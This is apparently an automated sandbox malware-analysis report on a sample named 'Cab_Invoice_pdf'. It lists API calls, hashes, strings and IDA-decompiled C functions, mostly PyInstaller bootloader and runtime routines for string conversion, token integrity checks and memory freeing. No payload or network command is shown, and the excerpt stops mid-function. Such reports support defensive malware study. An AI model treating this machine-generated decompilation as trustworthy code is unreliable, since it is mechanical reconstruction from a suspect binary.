                            • Instruction ID: dab722728629debfbe80f8c87f8a36daca0fc5cf6a84b6cb9ea02a99bf7b2205
                            • Opcode Fuzzy Hash: 2340c8f7ea8ffafdc6fee6b14c5b6d4f79176588c13015ce15fd1852b6b20086
                            • Instruction Fuzzy Hash: 27313BF2BF452ACBD7004BA9C851A29B3E3DB46616B8C4259F496CB387D325D48BC790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_BadArgument.PYTHON38(combining,argument,a unicode character,?), ref: 6E2F18C3
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F18D8
                            • PyLong_FromLong.PYTHON38(?), ref: 6E2F19BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Arg_ArgumentFromLongLong_ReadyUnicode_
                            • String ID: a unicode character$argument$combining
                            • API String ID: 4207899037-4202047184
                            • Opcode ID: 1c38538710d60f910587390343a238186ac0e69129618c992e8a07b4f02b3e4e
                            • Instruction ID: 70485c6119b4a28549f3445060d7782d8a97b3a6f3ce78fd2daea4d65c2a8220
                            • Opcode Fuzzy Hash: 1c38538710d60f910587390343a238186ac0e69129618c992e8a07b4f02b3e4e
                            • Instruction Fuzzy Hash: CF317CF27F456ACBE7004BADCD41B39B3E6FF02615B484268F496CA282D324D5CAC6D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyUnicode_FromString.PYTHON38(6E2F61FB), ref: 6E2F28F7
                            • memcpy.VCRUNTIME140(?), ref: 6E2F2968
                            • PyOS_snprintf.PYTHON38(?,00000100,%04X,?), ref: 6E2F29A9
                            • PyUnicode_FromStringAndSize.PYTHON38(?), ref: 6E2F29D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FromStringUnicode_$S_snprintfSizememcpy
                            • String ID: $%04X
                            • API String ID: 3253253298-4013080060
                            • Opcode ID: 066fdfa67b077bbc190735b21b970d01d27a3f75ef6094be01783ad913b09316
                            • Instruction ID: 12b0e364c0786bcc08782d38fab4e5228c8360f295ac2cab0e1373cba5246afb
                            • Opcode Fuzzy Hash: 066fdfa67b077bbc190735b21b970d01d27a3f75ef6094be01783ad913b09316
                            • Instruction Fuzzy Hash: 87319AB394419EDBCB108FA8DC44AD9B7BAEF87301F2405A9DC8993200CA729E47C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 56%
                            			E01314D40(void* __ecx, void* __edx, void* __eflags) {
                            				int* _t18;
                            				short* _t21;
                            				char* _t22;
                            				short* _t28;
                            				int* _t31;
                            				void* _t34;
                            				short* _t36;
                            				int* _t41;
                            				signed int _t42;
                            				char* _t44;
                            				int _t45;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            
                            				_t34 = __edx;
                            				_t44 =  *(_t46 + 0x14);
                            				_push(4);
                            				_push( &(_t44[1]));
                            				_t18 = E013197F8(__ecx);
                            				_t31 = _t18;
                            				_t47 = _t46 + 8;
                            				if(_t31 != 0) {
                            					_t36 = 0;
                            					__eflags = _t44;
                            					if(_t44 <= 0) {
                            						L17:
                            						_t31[_t44] = 0;
                            						return _t31;
                            					} else {
                            						_t41 = _t31;
                            						_t21 =  *(_t47 + 0x20) - _t31;
                            						__eflags = _t21;
                            						 *(_t47 + 0x20) = _t21;
                            						while(1) {
                            							_t22 =  *(_t21 + _t41);
                            							 *(_t47 + 0x28) = _t22;
                            							_t45 = MultiByteToWideChar(0xfde9, 0, _t22, 0xffffffff, 0, 0);
                            							__eflags = _t45;
                            							if(__eflags == 0) {
                            								break;
                            							}
                            							_t7 = _t45 + 1; // 0x1
                            							_push(2);
                            							_push(_t7);
                            							_t28 = E013197F8(_t7);
                            							_t47 = _t47 + 8;
                            							 *(_t47 + 0x14) = _t28;
                            							__eflags = _t28;
                            							if(__eflags == 0) {
                            								_push("Out of memory.");
                            								_push("win32_utils_from_utf8");
                            								goto L13;
                            							} else {
                            								__eflags = MultiByteToWideChar(0xfde9, 0,  *(_t47 + 0x1c), 0xffffffff, _t28, _t45);
                            								if(__eflags == 0) {
                            									_push("Failed to decode wchar_t from UTF-8\n");
                            									L12:
                            									_push("MultiByteToWideChar");
                            									L13:
                            									E01311860(_t34, __eflags);
                            									_t48 = _t47 + 8;
                            									 *_t41 = 0;
                            									_t42 = 0;
                            									__eflags = _t36;
                            									if(_t36 >= 0) {
                            										do {
                            											L01319803(_t31[_t42]);
                            											_t42 = _t42 + 1;
                            											_t48 = _t48 + 4;
                            											__eflags = _t42 - _t36;
                            										} while (_t42 <= _t36);
                            									}
                            									L01319803(_t31);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t36 =  &(_t36[0]);
                            									_t44 =  *(_t47 + 0x1c);
                            									 *_t41 =  *(_t47 + 0x14);
                            									_t41 =  &(_t41[1]);
                            									__eflags = _t36 - _t44;
                            									if(_t36 >= _t44) {
                            										goto L17;
                            									} else {
                            										_t21 =  *(_t47 + 0x20);
                            										continue;
                            									}
                            								}
                            							}
                            							goto L18;
                            						}
                            						_push("Failed to get wchar_t buffer size.\n");
                            						goto L12;
                            					}
                            				} else {
                            					return _t18;
                            				}
                            				L18:
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,01313951,?,00000000,01313951,?), ref: 01314D95
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01314DC6
                            Strings
                            • Out of memory., xrefs: 01314DEF
                            • Failed to get wchar_t buffer size., xrefs: 01314DFB
                            • Failed to decode wchar_t from UTF-8, xrefs: 01314DE8
                            • MultiByteToWideChar, xrefs: 01314E00
                            • win32_utils_from_utf8, xrefs: 01314DF4
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 626452242-306716450
                            • Opcode ID: 78c9afb99ccde7c4cb944330b405ea4341c58f3a312e30f6b9047e58445df7b4
                            • Instruction ID: 6582a99377bcf9e1854667b7a6b5f1c92d33b4cd34ed1d465d855fae31427794
                            • Opcode Fuzzy Hash: 78c9afb99ccde7c4cb944330b405ea4341c58f3a312e30f6b9047e58445df7b4
                            • Instruction Fuzzy Hash: 6A319DB1648306ABDB206F5CAC41F6BBB98EF8071DF440139FE54A7284E775D50483A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E6E2F4533(void* __edx) {
                            				intOrPtr _t24;
                            				void* _t34;
                            				intOrPtr _t35;
                            				void* _t37;
                            				void* _t40;
                            				void* _t41;
                            				intOrPtr _t42;
                            				intOrPtr _t44;
                            				void* _t46;
                            				void* _t50;
                            
                            				_t40 = __edx;
                            				E6E2F5090(_t34, _t41, 0x6e3f7628, 0xc);
                            				_t42 =  *((intOrPtr*)(_t46 + 0xc));
                            				if(_t42 != 0) {
                            					L3:
                            					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                            					if(_t42 == 1 || _t42 == 2) {
                            						_t35 =  *((intOrPtr*)(_t46 + 0x10));
                            						_t44 = E6E2F463E( *((intOrPtr*)(_t46 + 8)), _t42, _t35);
                            						 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
                            						if(_t44 != 0) {
                            							_t44 = E6E2F4329(_t37,  *((intOrPtr*)(_t46 + 8)), _t42, _t35);
                            							 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
                            							if(_t44 != 0) {
                            								goto L8;
                            							}
                            						}
                            					} else {
                            						_t35 =  *((intOrPtr*)(_t46 + 0x10));
                            						L8:
                            						_push(_t35);
                            						_t44 = E6E2F4A3C( *((intOrPtr*)(_t46 + 8)), _t42);
                            						 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
                            						if(_t42 == 1 && _t44 == 0) {
                            							_push(_t35);
                            							_push((E6E2F4A3C( *((intOrPtr*)(_t46 + 8)), _t26) & 0xffffff00 | _t35 != 0x00000000) & 0x000000ff);
                            							E6E2F4483(_t35, _t40, _t42);
                            							_pop(_t37);
                            							E6E2F463E( *((intOrPtr*)(_t46 + 8)), _t44, _t35);
                            						}
                            						if(_t42 == 0 || _t42 == 3) {
                            							_t44 = E6E2F4329(_t37,  *((intOrPtr*)(_t46 + 8)), _t42, _t35);
                            							 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
                            							if(_t44 != 0) {
                            								_t44 = E6E2F463E( *((intOrPtr*)(_t46 + 8)), _t42, _t35);
                            								 *((intOrPtr*)(_t46 - 0x1c)) = _t44;
                            							}
                            						}
                            					}
                            					 *(_t46 - 4) = 0xfffffffe;
                            					_t24 = _t44;
                            				} else {
                            					_t50 =  *0x6e3f8a48 - _t42; // 0x1
                            					if(_t50 > 0) {
                            						goto L3;
                            					} else {
                            						_t24 = 0;
                            					}
                            				}
                            				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0x10));
                            				return _t24;
                            			}














                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3353612457-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E0132534A(char* _a4, short* _a8) {
                            				int _v8;
                            				void* __ecx;
                            				short* _t10;
                            				short* _t14;
                            				int _t15;
                            				short* _t16;
                            				void* _t26;
                            				int _t27;
                            				void* _t29;
                            				short* _t35;
                            				short* _t39;
                            				short* _t40;
                            
                            				_push(_t29);
                            				if(_a4 != 0) {
                            					_t39 = _a8;
                            					__eflags = _t39;
                            					if(__eflags != 0) {
                            						_push(_t26);
                            						E0132369E(_t29, __eflags);
                            						asm("sbb ebx, ebx");
                            						_t35 = 0;
                            						_t27 = _t26 + 1;
                            						 *_t39 = 0;
                            						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                            						_v8 = _t10;
                            						__eflags = _t10;
                            						if(_t10 != 0) {
                            							_t40 = E01320A25(_t29, _t10 + _t10);
                            							__eflags = _t40;
                            							if(_t40 != 0) {
                            								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                            								__eflags = _t15;
                            								if(_t15 != 0) {
                            									_t16 = _t40;
                            									_t40 = 0;
                            									_t35 = 1;
                            									__eflags = 1;
                            									 *_a8 = _t16;
                            								} else {
                            									E0131C998(GetLastError());
                            								}
                            							}
                            							E013209EB(_t40);
                            							_t14 = _t35;
                            						} else {
                            							E0131C998(GetLastError());
                            							_t14 = 0;
                            						}
                            					} else {
                            						 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            						E01321788();
                            						_t14 = 0;
                            					}
                            					return _t14;
                            				}
                            				 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            				E01321788();
                            				return 0;
                            			}
















                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01327F23(intOrPtr _a4) {
                            				void* _t18;
                            
                            				_t45 = _a4;
                            				if(_a4 != 0) {
                            					E01327EE7(_t45, 7);
                            					E01327EE7(_t45 + 0x1c, 7);
                            					E01327EE7(_t45 + 0x38, 0xc);
                            					E01327EE7(_t45 + 0x68, 0xc);
                            					E01327EE7(_t45 + 0x98, 2);
                            					E013209EB( *((intOrPtr*)(_t45 + 0xa0)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0xa4)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0xa8)));
                            					E01327EE7(_t45 + 0xb4, 7);
                            					E01327EE7(_t45 + 0xd0, 7);
                            					E01327EE7(_t45 + 0xec, 0xc);
                            					E01327EE7(_t45 + 0x11c, 0xc);
                            					E01327EE7(_t45 + 0x14c, 2);
                            					E013209EB( *((intOrPtr*)(_t45 + 0x154)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0x158)));
                            					E013209EB( *((intOrPtr*)(_t45 + 0x15c)));
                            					return E013209EB( *((intOrPtr*)(_t45 + 0x160)));
                            				}
                            				return _t18;
                            			}





                            APIs
                              • Part of subcall function 01327EE7: _free.LIBCMT ref: 01327F10
                            • _free.LIBCMT ref: 01327F71
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01327F7C
                            • _free.LIBCMT ref: 01327F87
                            • _free.LIBCMT ref: 01327FDB
                            • _free.LIBCMT ref: 01327FE6
                            • _free.LIBCMT ref: 01327FF1
                            • _free.LIBCMT ref: 01327FFC
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E01314BF0(short* _a4, char* _a8, int _a12) {
                            				void* _t17;
                            				void* _t18;
                            				int _t19;
                            				short* _t20;
                            				void* _t21;
                            
                            				_t20 = _a4;
                            				if(_t20 != 0) {
                            					_t19 = _a12;
                            					goto L6;
                            				} else {
                            					_t19 = MultiByteToWideChar(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20);
                            					_t26 = _t19;
                            					if(_t19 != 0) {
                            						_t3 = _t19 + 1; // 0x1
                            						_push(2);
                            						_t20 = E013197F8(_t17);
                            						_t21 = _t21 + 8;
                            						__eflags = _t20;
                            						if(__eflags != 0) {
                            							L6:
                            							__eflags = MultiByteToWideChar(0xfde9, 0, _a8, 0xffffffff, _t20, _t19);
                            							if(__eflags != 0) {
                            								return _t20;
                            							} else {
                            								_push("Failed to decode wchar_t from UTF-8\n");
                            								_push("MultiByteToWideChar");
                            								E01311860(_t18, __eflags);
                            								__eflags = 0;
                            								return 0;
                            							}
                            						} else {
                            							_push("Out of memory.");
                            							_push("win32_utils_from_utf8");
                            							E01311860(_t18, __eflags);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Failed to get wchar_t buffer size.\n");
                            						_push("MultiByteToWideChar");
                            						E01311860(_t18, _t26);
                            						return 0;
                            					}
                            				}
                            			}









                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C69
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 1717984340-306716450
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 66%
                            			E01314920() {
                            				void* _v4;
                            				void* _v8;
                            				long _v12;
                            				long _v16;
                            				void* _t18;
                            				void* _t28;
                            				void* _t30;
                            				long* _t32;
                            
                            				_t32 =  &_v12;
                            				_v8 = 0xffffffff;
                            				_t30 = 0;
                            				_v12 = 0;
                            				_v4 = 0;
                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0 && (GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a)) {
                            					_push(_v16);
                            					_push(1);
                            					_t30 = E013197F8(_t28);
                            					_t32 =  &(_t32[2]);
                            					if(_t30 != 0 && GetTokenInformation(_v12, 1, _t30, _v16,  &_v16) != 0) {
                            						_push( &_v12);
                            						_push( *_t30);
                            						L01317858();
                            					}
                            				}
                            				L01319803(_t30);
                            				_t18 = _v8;
                            				if(_t18 != 0xffffffff) {
                            					CloseHandle(_t18);
                            				}
                            				return _v4;
                            			}












                            APIs
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                            • OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                            • GetLastError.KERNEL32 ref: 01314969
                            • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                            • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                            • String ID:
                            • API String ID: 995526605-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E01328F51(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                            				signed int _v8;
                            				int _v12;
                            				void* _v24;
                            				signed int _t49;
                            				signed int _t54;
                            				int _t56;
                            				signed int _t58;
                            				short* _t60;
                            				signed int _t64;
                            				short* _t68;
                            				int _t76;
                            				short* _t79;
                            				signed int _t85;
                            				signed int _t88;
                            				void* _t93;
                            				void* _t94;
                            				int _t96;
                            				short* _t99;
                            				int _t101;
                            				int _t103;
                            				signed int _t104;
                            				short* _t105;
                            				void* _t108;
                            
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t49 =  *0x133c008; // 0xa212446c
                            				_v8 = _t49 ^ _t104;
                            				_t101 = _a20;
                            				if(_t101 > 0) {
                            					_t76 = E0132CA63(_a16, _t101);
                            					_t108 = _t76 - _t101;
                            					_t4 = _t76 + 1; // 0x1
                            					_t101 = _t4;
                            					if(_t108 >= 0) {
                            						_t101 = _t76;
                            					}
                            				}
                            				_t96 = _a32;
                            				if(_t96 == 0) {
                            					_t96 =  *( *_a4 + 8);
                            					_a32 = _t96;
                            				}
                            				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                            				_v12 = _t54;
                            				if(_t54 == 0) {
                            					L38:
                            					E0131786A();
                            					return _t54;
                            				} else {
                            					_t93 = _t54 + _t54;
                            					_t83 = _t93 + 8;
                            					asm("sbb eax, eax");
                            					if((_t93 + 0x00000008 & _t54) == 0) {
                            						_t79 = 0;
                            						__eflags = 0;
                            						L14:
                            						if(_t79 == 0) {
                            							L36:
                            							_t103 = 0;
                            							L37:
                            							E0132815E(_t79);
                            							_t54 = _t103;
                            							goto L38;
                            						}
                            						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                            						_t119 = _t56;
                            						if(_t56 == 0) {
                            							goto L36;
                            						}
                            						_t98 = _v12;
                            						_t58 = E01323980(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                            						_t103 = _t58;
                            						if(_t103 == 0) {
                            							goto L36;
                            						}
                            						if((_a12 & 0x00000400) == 0) {
                            							_t94 = _t103 + _t103;
                            							_t85 = _t94 + 8;
                            							__eflags = _t94 - _t85;
                            							asm("sbb eax, eax");
                            							__eflags = _t85 & _t58;
                            							if((_t85 & _t58) == 0) {
                            								_t99 = 0;
                            								__eflags = 0;
                            								L30:
                            								__eflags = _t99;
                            								if(__eflags == 0) {
                            									L35:
                            									E0132815E(_t99);
                            									goto L36;
                            								}
                            								_t60 = E01323980(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                            								__eflags = _t60;
                            								if(_t60 == 0) {
                            									goto L35;
                            								}
                            								_push(0);
                            								_push(0);
                            								__eflags = _a28;
                            								if(_a28 != 0) {
                            									_push(_a28);
                            									_push(_a24);
                            								} else {
                            									_push(0);
                            									_push(0);
                            								}
                            								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                            								__eflags = _t103;
                            								if(_t103 != 0) {
                            									E0132815E(_t99);
                            									goto L37;
                            								} else {
                            									goto L35;
                            								}
                            							}
                            							_t88 = _t94 + 8;
                            							__eflags = _t94 - _t88;
                            							asm("sbb eax, eax");
                            							_t64 = _t58 & _t88;
                            							_t85 = _t94 + 8;
                            							__eflags = _t64 - 0x400;
                            							if(_t64 > 0x400) {
                            								__eflags = _t94 - _t85;
                            								asm("sbb eax, eax");
                            								_t99 = E01320A25(_t85, _t64 & _t85);
                            								_pop(_t85);
                            								__eflags = _t99;
                            								if(_t99 == 0) {
                            									goto L35;
                            								}
                            								 *_t99 = 0xdddd;
                            								L28:
                            								_t99 =  &(_t99[4]);
                            								goto L30;
                            							}
                            							__eflags = _t94 - _t85;
                            							asm("sbb eax, eax");
                            							E0132F250();
                            							_t99 = _t105;
                            							__eflags = _t99;
                            							if(_t99 == 0) {
                            								goto L35;
                            							}
                            							 *_t99 = 0xcccc;
                            							goto L28;
                            						}
                            						_t68 = _a28;
                            						if(_t68 == 0) {
                            							goto L37;
                            						}
                            						_t123 = _t103 - _t68;
                            						if(_t103 > _t68) {
                            							goto L36;
                            						}
                            						_t103 = E01323980(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                            						if(_t103 != 0) {
                            							goto L37;
                            						}
                            						goto L36;
                            					}
                            					asm("sbb eax, eax");
                            					_t70 = _t54 & _t93 + 0x00000008;
                            					_t83 = _t93 + 8;
                            					if((_t54 & _t93 + 0x00000008) > 0x400) {
                            						__eflags = _t93 - _t83;
                            						asm("sbb eax, eax");
                            						_t79 = E01320A25(_t83, _t70 & _t83);
                            						_pop(_t83);
                            						__eflags = _t79;
                            						if(__eflags == 0) {
                            							goto L36;
                            						}
                            						 *_t79 = 0xdddd;
                            						L12:
                            						_t79 =  &(_t79[4]);
                            						goto L14;
                            					}
                            					asm("sbb eax, eax");
                            					E0132F250();
                            					_t79 = _t105;
                            					if(_t79 == 0) {
                            						goto L36;
                            					}
                            					 *_t79 = 0xcccc;
                            					goto L12;
                            				}
                            			}

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0131C00D,0131C00D,?,?,?,013291A2,00000001,00000001,DEE85006), ref: 01328FAB
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,013291A2,00000001,00000001,DEE85006,?,?,?), ref: 01329031
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,DEE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0132912B
                            • __freea.LIBCMT ref: 01329138
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • __freea.LIBCMT ref: 01329141
                            • __freea.LIBCMT ref: 01329166
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 00c36c352380db60a4c3e647d8dd708c2337319cee0787829235bb3fb91b46b6
                            • Instruction ID: c7aa4dd68e4af622cb59dfa7c3cbc7cc1c169d6af6af7919a172d54a677224f5
                            • Opcode Fuzzy Hash: 00c36c352380db60a4c3e647d8dd708c2337319cee0787829235bb3fb91b46b6
                            • Instruction Fuzzy Hash: 4951B67261023AABEB25AE69DC44FBB7BAAEF4465CF25462CFD04D6140DB34EC44C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E01324425(void* __ebx, void* __ecx, void* __edx) {
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t2;
                            				void* _t3;
                            				void* _t4;
                            				intOrPtr _t9;
                            				void* _t11;
                            				void* _t20;
                            				void* _t21;
                            				void* _t23;
                            				void* _t25;
                            				void* _t27;
                            				void* _t29;
                            				void* _t31;
                            				void* _t32;
                            				long _t36;
                            				long _t37;
                            				void* _t40;
                            
                            				_t29 = __edx;
                            				_t23 = __ecx;
                            				_t20 = __ebx;
                            				_t36 = GetLastError();
                            				_t2 =  *0x133c238; // 0x6
                            				_t42 = _t2 - 0xffffffff;
                            				if(_t2 == 0xffffffff) {
                            					L2:
                            					_t3 = E01320B10(_t23, 1, 0x364);
                            					_t31 = _t3;
                            					_pop(_t25);
                            					if(_t31 != 0) {
                            						_t4 = E01323862(_t25, __eflags,  *0x133c238, _t31);
                            						__eflags = _t4;
                            						if(_t4 != 0) {
                            							E01324297(_t25, _t31, 0x13463f0);
                            							E013209EB(0);
                            							_t40 = _t40 + 0xc;
                            							__eflags = _t31;
                            							if(_t31 == 0) {
                            								goto L9;
                            							} else {
                            								goto L8;
                            							}
                            						} else {
                            							_push(_t31);
                            							goto L4;
                            						}
                            					} else {
                            						_push(_t3);
                            						L4:
                            						E013209EB();
                            						_pop(_t25);
                            						L9:
                            						SetLastError(_t36);
                            						E01320ACD(_t20, _t29, _t31, _t36);
                            						asm("int3");
                            						_push(_t20);
                            						_push(_t36);
                            						_push(_t31);
                            						_t37 = GetLastError();
                            						_t21 = 0;
